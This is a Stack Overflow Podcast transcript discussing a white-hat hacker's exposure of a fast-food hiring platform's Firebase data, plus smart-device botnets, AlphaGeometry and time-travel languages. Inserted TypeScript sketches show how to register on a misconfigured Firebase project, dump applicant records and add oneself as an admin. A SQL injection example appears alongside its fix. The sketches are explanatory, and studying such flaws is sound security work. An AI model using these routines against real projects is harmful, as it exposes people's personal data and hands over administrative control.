The Stack Overflow Podcast

Hacking the hamburger: How a pentester exposed holes in hundreds of fast-food chains

Episode Summary

Ben and Ryan talk about the hacker who exposed a security vulnerability in AI-powered software, security risks of smart devices, symbolic deduction engines in AI, and the programming language that features time travel.

Episode Notes

A white-hat hacker uncovered security vulnerabilities in an AI-powered hiring system used by fast-food chains and hourly employees around the world. Read the blog post or watch this explainer.

Mariposa is a programming language with time travel.

Want to be an individual contributor (IC) who still amplifies the performance of everyone around you? Be a radiating programmer.

Congratulations to onmyway133, winner of a Stellar Question badge for What does the suspend function mean in a Kotlin Coroutine?.

Episode Transcription

[intro music plays]

Ben Popper With DoiT, optimizing your cloud spend while controlling your costs is easy. By combining intelligent software with expert consultancy and unlimited support, DoiT delivers the true promise of the cloud with ease, not cost. Learn more at doit.com.

BP Hello, everybody. Welcome back to the Stack Overflow Podcast, a place to talk all things software and technology. I'm your host, Ben Popper, Director of Content here at Stack Overflow, joined as I often am by the editor of our blog and impresario of our newsletter, Ryan Donovan. Hey, Ryan. 

Ryan Donovan Hey, Ben. What's news?

BP So there was a fun blog post released recently from a white hat hacker explaining how they got access to the systems of –they claim– half of America's fast food chains simultaneously. I watched the video, I read a bit of the blog. I'd love to dive into the details, but before I do, top line thoughts here, what did you think of the breakdown?

RD I think it's interesting in that it shows how little attention some companies pay to security. The first-line read is that they didn't configure Firebase correctly. They just didn't set up security on it. 

BP So the way the attacker, the white hat, gained access is not complicated. You drop a Firebase config from a JS bundle into Firepwn. Pwn like own? Fire Pwn? 

RD Pwn, yeah. 

BP But if you use Firebase's registration feature to create a new user, you get full privileges, read/write to the Firebase DB. Yikes! The data it exposes includes, but is not limited to: names, phone numbers, emails, plain text passwords (only some had this), locations of the restaurants themselves, confidential messages, and shifts for the following: Chatter employees (Chatter is the name of the startup that they used as their backdoor), franchisee managers, and job applicants. Yikes, that is pretty pwned. 
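
As a rough illustration of the kind of misconfiguration being described, here is a minimal sketch using the Firebase web SDK. Everything project-specific here (the config values, the "applicants" collection, the example rules) is assumed for illustration and is not taken from the write-up.

```typescript
// Hypothetical Firestore security rules that would reproduce the problem:
// any authenticated user gets full read/write access to every document.
//
//   rules_version = '2';
//   service cloud.firestore {
//     match /databases/{database}/documents {
//       match /{document=**} {
//         allow read, write: if request.auth != null;
//       }
//     }
//   }

import { initializeApp } from "firebase/app";
import { getAuth, createUserWithEmailAndPassword } from "firebase/auth";
import { getFirestore, collection, getDocs } from "firebase/firestore";

// Config values like these ship inside the public JS bundle, so finding them
// isn't the vulnerability; the permissive rules are.
const app = initializeApp({
  apiKey: "AIza-example",                        // hypothetical
  authDomain: "example-project.firebaseapp.com", // hypothetical
  projectId: "example-project",                  // hypothetical
});

async function dumpData() {
  // Self-service registration: if email/password sign-up is left enabled,
  // anyone can mint a valid authenticated user.
  const auth = getAuth(app);
  await createUserWithEmailAndPassword(auth, "attacker@example.com", "hunter22");

  // Under the rules sketched above, that brand-new user can read any
  // collection, e.g. a hypothetical "applicants" collection.
  const db = getFirestore(app);
  const snapshot = await getDocs(collection(db, "applicants"));
  snapshot.forEach((d) => console.log(d.id, d.data()));
}

dumpData().catch(console.error);
```

The fix is the unglamorous one: lock the security rules down per collection and per role, because the client-side config can never be a secret.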

RD But wait, there's more. 

BP But wait, there's more. What comes next? 

RD Well, apparently it got worse, in that you could grab the list of admin users and then splice a new entry in there, and you got full access to the administrative dashboard. You could accept and deny applicants and refund payments made to Chatter. It seemed like a pretty big hole there. Good thing they were white hat hackers. They were doing this as a test. 
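
The escalation step could look something like the continuation below, reusing the hypothetical app and attacker account from the previous sketch; the "admins" collection name and document shape are assumptions, not details from the write-up.

```typescript
import type { FirebaseApp } from "firebase/app";
import { getFirestore, collection, getDocs, addDoc } from "firebase/firestore";

async function escalateToAdmin(app: FirebaseApp, attackerEmail: string) {
  const db = getFirestore(app);

  // 1. Read the existing admin users to learn what an entry looks like.
  const admins = await getDocs(collection(db, "admins")); // hypothetical collection
  admins.forEach((d) => console.log("existing admin:", d.id, d.data()));

  // 2. "Splice" in a new entry: with open write rules, nothing prevents it.
  await addDoc(collection(db, "admins"), {
    email: attackerEmail,   // the account registered in the previous sketch
    role: "administrator",  // hypothetical field mirroring an existing entry
  });

  // If the dashboard's authorization check is just "is this user in the
  // admins collection?", the attacker's account now passes it.
}
```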

BP They put up the timeline here. So this would have been June that they found this vulnerability. September, they finished the write up and emailed folks. October, the vulnerability is patched. September, the support ticket is closed. No thanks or further contact received despite explicitly requesting it. Well, you’ve got to be nice to your white hats when they come in with a bug bounty like this, I think. 

RD Absolutely. And I think one of the interesting things is that they started it by scanning ‘.ai’ sites, basically assuming that these are put up quickly, put up to get in on the AI bounty but without doing the due diligence of security. 

BP It seems like a reasonable thesis. A lot of people are trying to move fast and be first, and looking for young companies, which may not have as much experience, is a reasonable way to slice your attack surface, not necessarily just because they're AI. I guess the question in my mind is, in my experience on the enterprise software side, big companies require enormous amounts of upfront legal work and need you to show all kinds of certifications, that you're SOC 2 compliant and ISO-this compliant, and I wonder how they got around that or if this was somehow an exemption from that.

RD I don't know. These are techniques that aren't tested for or aren't considered in those audits. 

BP This is from Mr. Bruh, of MrBruh's Epic Blog: “Welcome gamers to my epic blog. My name is Paul. I'm a programmer from New Zealand and an aspiring cybersecurity ‘professional.’” Well, Mr. Bruh, you got your moment in the sun and congratulations to you. 

RD If you want to get famous on the internet, go bust some Firebase instances. 

BP It seems like there was a time when web scripting attacks were the big thing– and I know we had a guest on not too long ago who mentioned that web scripting attacks are still a thing– but in my experience over the last 5 or 10 years, most of the time the vulnerability is on the database or cloud hosting side, where somebody forgot to properly secure an environment where they're storing stuff online. 

RD I think that's because most of the software exists on that cloud environment. Everything goes through the cloud so if you want to access the actual files, you have to get into the cloud.

BP That makes sense. But I guess it's funny because a lot of times you think about the on-prem attack, the pen testing, the spear phishing, and yet this is one person in New Zealand just poking around on Firebase. 

RD It used to be that you could just have form fields execute arbitrary SQL code or overflow their boundaries, doing these sorts of shady things, just because a lot of web stuff would execute input as code. So at least we're making steps in the right direction. 
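
For readers who missed that era, here is a minimal sketch of the injection pattern Ryan is describing, using the node-postgres client; the table and column names are invented for illustration.

```typescript
import { Pool } from "pg";

const pool = new Pool({ connectionString: process.env.DATABASE_URL });

// Vulnerable: the field's value is pasted straight into the SQL string, so
// input like  ' OR '1'='1  changes the meaning of the query.
async function findUserUnsafe(name: string) {
  return pool.query(`SELECT * FROM users WHERE name = '${name}'`);
}

// Safer: a parameterized query keeps the input as data, never as code.
async function findUserSafe(name: string) {
  return pool.query("SELECT * FROM users WHERE name = $1", [name]);
}
```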

BP I feel like I saw something recently that was pretty interesting. I can't remember what it was now, but more along the lines of what I was saying, it was about how somebody used a water filter to smuggle some malware into a high security site. They came in and changed the water filter but somehow hooked it up to the network. 

RD Oh, yeah. With everything being a smart device, that's going to be… I saw something where somebody was like, “Why is my washing machine sending 3.6 gigabytes of data every day?” And I was like, “Oh no, you're a botnet, man.”

BP What was it sending? That's good, I want to know. I like that. Mystery surrounds the LG washing machine. 150 megabytes of data per hour from a rogue process and he ended up blocking it on the router. Yikes. We'll have to come back to this one when somebody gets the answer, because it looks like it was either being used to send spam or launch DDoS attacks. That's the hypothesis, but we don't know right now. 

RD And that's the danger with everything being smart. I don't think we need everything to be smart. Bless them for innovating and trying, but my fridge doesn't need Wi-Fi access.

BP I think the one that I read was interesting in the sense that a water filter, I'm not sure it was even a connected or smart one, but you bring it into the right area and it's able to look for Bluetooth and Wi-Fi connections. So it’s sort of that you smuggle it in to get past the air gap of needing to get onto these local networks where the signal isn't that strong. All right, moving on to another thing I wanted to discuss. So the folks over at Google DeepMind have progressively been making their way through the intellectual challenges that humans take on, and they use the Alpha system. So AlphaGo was the one that beat Go, and then they had AlphaZero, they had AlphaCode, which is really good at code, and this week they talked about something called AlphaGeometry, which was able to score in between the silver and gold medalist at the geometry Olympiad, which I guess is a proving ground for some of the best mathematical minds out there. And what was really interesting about this, and you and I have talked about this before, is that they combined what's great about the language model with something new called a symbolic deduction engine. And so they likened this to that famous book, Thinking, Fast and Slow. One system kind of provides intuitive ideas and the other one checks them, reasons through them, uses them to maybe draw conclusions or find a potential pathway forward, and then they go back and forth to solve it, which I thought was pretty cool.
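
A very loose sketch of the alternation described in the DeepMind post, with both components stubbed out as interfaces; none of these names come from AlphaGeometry itself.

```typescript
// Hypothetical stand-ins for the two components.
interface LanguageModel {
  // "Fast" intuition: suggest an auxiliary construction, e.g. "add midpoint M of AB".
  proposeConstruction(problem: string, knownFacts: string[]): string;
}

interface SymbolicEngine {
  // "Slow" reasoning: exhaustively apply geometry rules and report what follows.
  deduce(problem: string, constructions: string[]): { facts: string[]; provesGoal: boolean };
}

// Alternate between the two until the deduction engine can reach the goal.
function solve(
  problem: string,
  lm: LanguageModel,
  engine: SymbolicEngine,
  maxSteps = 10,
): string[] | null {
  const constructions: string[] = [];

  for (let step = 0; step < maxSteps; step++) {
    const result = engine.deduce(problem, constructions);
    if (result.provesGoal) {
      return constructions; // a verifiable, rule-based proof was found
    }
    // Deduction is stuck, so ask the model for the next intuitive construction.
    constructions.push(lm.proposeConstruction(problem, result.facts));
  }
  return null; // no proof within the step budget
}
```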

RD I've read some theoretical takes on LLM AIs where they're saying we need to create a logical, semantic, symbolic language for the AIs. And they've done that in other areas– created these formal logics– and I think it's interesting that they're combining them: here's a sort of symbolic way of reasoning, and then here's the natural language way of assembling things together. 

BP I feel like it makes sense if you think about biological intelligence at the human level, which is to say, at first you're just kind of learning things experientially and instinctually through trial and error, and a lot of what you're producing is nonsense. And then over time, people give you symbols and structures and tools that let you go farther with that intelligence. So in this blog post, they wrote that language models excel at identifying general patterns and relationships in data. They can quickly predict potentially useful constructs, but they often lack the ability to reason rigorously or explain their decisions. Sounds like children. That sounds like my kids. Symbolic deduction engines, on the other hand, are based on formal logic and use clear rules to arrive at conclusions. 

RD From what I remember of high school geometry, and geometry was honestly one of my favorite math subjects, it was a lot of applying rules, applying techniques. You could just find the way into the puzzle and then follow the steps down. 

BP There was a quote in here that I thought was good from someone who had gotten the gold medal, and it said, “The AlphaGeometry output is impressive because it's both verifiable and clean. It uses classical geometry rules with angles and similar triangles just as students do,” so it's not like it found a new way to do this. And to your point, Ryan, somebody who's not just a gold medalist but a Fields medalist, a serious mathematician, said, “It makes perfect sense to me that researchers in AI are trying their hands on geometry problems because finding solutions for them works a little bit like chess in the sense that we have a rather small number of sensible moves at every step.” But I still find it stunning that they could make it work. 

RD Anybody who's doing rule-based deduction, AI is coming for your job. When's the Fields Medal going to be awarded to AlphaGeometry?

BP Right, like how Sony gave that photography medal to the guy. They gave their big prize to the AI picture. That would be interesting if the test could be taken online so then AlphaGeometry could enter. All right, Ryan, I wanted to bring something up. Maybe we can get some feedback from the community. You mentioned this last time– your next blog post, a must read, is going to be about time travel. Give the readers just a little, not a spoiler, a little teaser here. 

RD Sure. Well, as we talked about last time, the time travel language Mariposa does interesting things. But in looking at it, during the 80’s and 90’s there was a whole set of little research languages that were about managing time and logically computing time, mostly for hardware processes. I haven't been able to find a lot about it because it seems very much centered around two or three figures with a little bit of other stuff, and it's also from the 80’s so there's not a whole lot there. But there are a lot of languages built off of Prolog, which I think is an old functional language, very symbolic too. And then of course there's the future quantum stuff. Everything is entangled.

BP We've talked once or twice on the podcast about the fact that in a sort of theoretical or a very limited lab environment, they have entangled data from one side of the world to the other and basically teleported it. It didn't go through a wire or a cable. It was entangled at the quantum level and when they interacted with it in one place, its state changed in another, which is pretty hard to wrap your mind around. 

RD And there's a paper that goes through this theoretical approach of sending information backwards a tick. There's arguments that that's not how quantum physics and entanglement work, but isn't it fun to think about it? 

BP Prolog first appeared in 1972. Robert Kowalski has a credit here, and it says, “A logic programming language that had its origins in AI and computational linguistics.” All right, that'll be fun. So you're going to try to find some folks to talk to on this? 

RD I don't know if those folks are still around. I'm just going to dip my toe into it and see what the time is about. 

BP Okay, cool. All right, last one. I just want to make a recommendation for a blog post. I'll put it in the show notes. It's not new, it's from the end of 2023. It's called the “Radiating Programmer,” and it's about folks who want to be individual contributors, but who also want to boost the productivity of everyone around them and do so in a way that makes their own jobs easier by getting everybody communicating in the same way. So this one has a bunch of ideas about what they call ceremonies (the way a scrum is a ceremony) that you could use to communicate. But I think more interestingly, it has the idea of pushing information out rather than waiting for someone to come and pull it from you. And I just thought this was cool because that's kind of the thesis of Stack Overflow for Teams. The more you can get the information out by answering the question once or by writing an article on it, the easier it is for other people to learn from that, and that extends your influence within the organization.

RD And I've heard from folks that the real value of senior-level programmers is not that they're putting out the most code, but that they're helping everyone else become productive. They are stores of information and coding practices. 

BP Yeah, I think that's right.

[music plays]

BP All right, everybody. It is that time of the show. Let's get down with somebody who came on Stack Overflow and helped to spread a little knowledge or add a little bit of curiosity. Congrats to onmyway133, awarded a Stellar Question Badge. That means the question has been saved by over 100 other users. “What does the suspend function mean in a Kotlin Coroutine?” Helped 220,000 people, so very helpful to a large group of people. As always, I am Ben Popper, Director of Content here at Stack Overflow. Thanks for listening. 

RD I'm Ryan Donovan. I edit the blog here at Stack Overflow. You can find the blog at stackoverflow.blog. And if you want to reach out to me on Twitter, perhaps about time and programming in time, you can find me @RThorDonovan. 

BP Sweet. All right, everybody. Thanks for listening, and we will talk to you soon.

[outro music plays]